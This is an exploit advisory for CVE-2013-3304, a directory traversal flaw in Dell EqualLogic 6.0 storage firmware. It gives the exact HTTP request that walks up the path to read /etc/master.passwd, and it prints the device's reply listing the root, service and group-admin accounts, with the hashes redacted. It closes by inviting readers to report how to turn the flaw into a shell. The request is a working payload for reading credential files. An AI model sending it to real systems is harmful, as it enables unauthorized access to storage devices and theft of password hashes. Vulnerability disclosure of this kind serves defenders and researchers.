52 lines
No EOL
1.1 KiB
Text
52 lines
No EOL
1.1 KiB
Text
# Exploit Title: Remote Directory Traversal exploit for Dell EqualLogic 6.0
|
||
Storage
|
||
# Date: 09/2013
|
||
# Exploit Author: Mauricio Pampim Corr<72>a
|
||
# Vendor Homepage: www.dell.com
|
||
# Version: 6.0
|
||
# Tested on: Equipment Model Dell EqualLogic PS4000
|
||
# CVE : CVE-2013-3304
|
||
|
||
|
||
|
||
The malicious user sends
|
||
|
||
|
||
|
||
GET //../../../../../../../../etc/master.passwd
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
And the Dell Storage answers
|
||
|
||
|
||
|
||
root:[hash] &:/root:/bin/sh
|
||
daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin
|
||
operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin
|
||
bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin
|
||
sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
|
||
uucp:*:[hash]:UNIX-to-UNIX
|
||
Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
|
||
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
|
||
grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
|
||
authgroup:[hash]:Group Authenication Account:/:/sbin/nologin
|
||
|
||
|
||
|
||
|
||
|
||
More informations in (Br-Portuguese) https://www.xlabs.com.br/blog/?p=50
|
||
|
||
|
||
|
||
Could obtain shell with flaw? send me an email telling me how, to
|
||
mauricio[at]xlabs.com.br
|
||
|
||
|
||
|
||
Thanks |